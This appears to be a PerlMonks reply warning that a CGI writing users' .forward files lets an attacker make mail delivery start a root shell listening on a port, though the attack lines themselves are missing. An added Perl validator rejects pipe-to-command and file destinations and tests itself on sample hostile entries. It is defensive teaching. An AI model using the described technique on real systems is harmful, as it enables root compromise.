PerlMonks

Re: writing to a user's directory
by BlueLines (Hermit) on Feb 19, 2001 at 22:07 UTC ([id://59518]=note)
This is pretty scary. While you could do something like this with a suid C wrapper, what if I (evil malicious user) added the following lines to root's .forward file:

Then I send an email to root, and I have a root shell listening on port 20012:

This is a bad thing, and exploits like this have been around for a while, since mail blindly executes the .forward / .vacation files. The best bet is to use the forwarding/vacation mechanism in your mail server itself. You could make your aliases(5) file writable by your httpd process. Or even better, the CGI could just dump its output to some flat file somewhere, where a cronjob (which runs every five minutes) would parse it, do some reality checking on the data, and then decide whether or not to proceed from there.

Sorry for the rant (and the non-Perl related post), but .forward files are such a huge security hole.

BlueLines

Disclaimer: This post may contain inaccurate information, be habit forming, cause atomic warfare between peaceful countries, speed up male pattern baldness, interfere with your cable reception, exile you from certain third world countries, ruin your marriage, and generally spoil your day. No batteries included, no strings attached, your mileage may vary.
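
The last suggestion in the post above (the CGI writes to a flat file and a cron job checks each entry before acting on it) could look like the following. This is an added example, not code from BlueLines or from the original thread; the tab-separated spool format, the `check_request` name and the `MIN_UID` cutoff are assumptions.

```perl
#!/usr/bin/perl
# Added example: the "reality checking" step of the cron job described in the post.
# Assumed spool format: one "user<TAB>address" request per line.
use strict;
use warnings;

use constant MIN_UID => 1000;   # assumed boundary between system and human accounts

# Returns (1, $user, $addr) when the request is acceptable, (0, $reason) otherwise.
# $uid_of is a coderef mapping a user name to a uid (undef if the user is unknown).
sub check_request {
    my ($line, $uid_of) = @_;
    chomp $line;
    my @f = split /\t/, $line, -1;
    return (0, 'wrong field count') unless @f == 2;
    my ($user, $addr) = @f;

    # Account: conservative character set, must exist, must not be a system account.
    return (0, 'bad user name') unless $user =~ /\A[a-z_][a-z0-9_-]{0,31}\z/;
    my $uid = $uid_of->($user);
    return (0, 'unknown user')   unless defined $uid;
    return (0, 'system account') if $uid < MIN_UID;

    # Destination: a plain mailbox only. The allowed characters exclude the
    # .forward forms that make the MTA run a program ("|cmd"), append to a
    # file ("/path") or read another file (":include:").
    return (0, 'destination is not a plain address')
        unless $addr =~ /\A[A-Za-z0-9._+-]{1,64}\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/;

    return (1, $user, $addr);
}

# Constructed sample data standing in for the spool file and the passwd database.
my %uids  = (root => 0, alice => 1001, bob => 1002);
my @spool = (
    "alice\talice\@example.org",
    "root\tsomeone\@example.org",
    "bob\t|/usr/local/bin/handler",
    "bob\t/var/tmp/mail.copy",
    "mallory\tm\@example.org",
);

for my $line (@spool) {
    my ($ok, @rest) = check_request($line, sub { $uids{ $_[0] } });
    (my $shown = $line) =~ s/[^\x20-\x7e]/?/g;   # keep log output printable
    printf "%-8s %s (%s)\n", $ok ? 'ACCEPT' : 'REJECT', $shown, join(' -> ', @rest);
}
```

Only the first sample line is accepted. In production the lookup coderef would wrap `getpwnam`, and the job would run as an unprivileged user that treats the spool file as untrusted input.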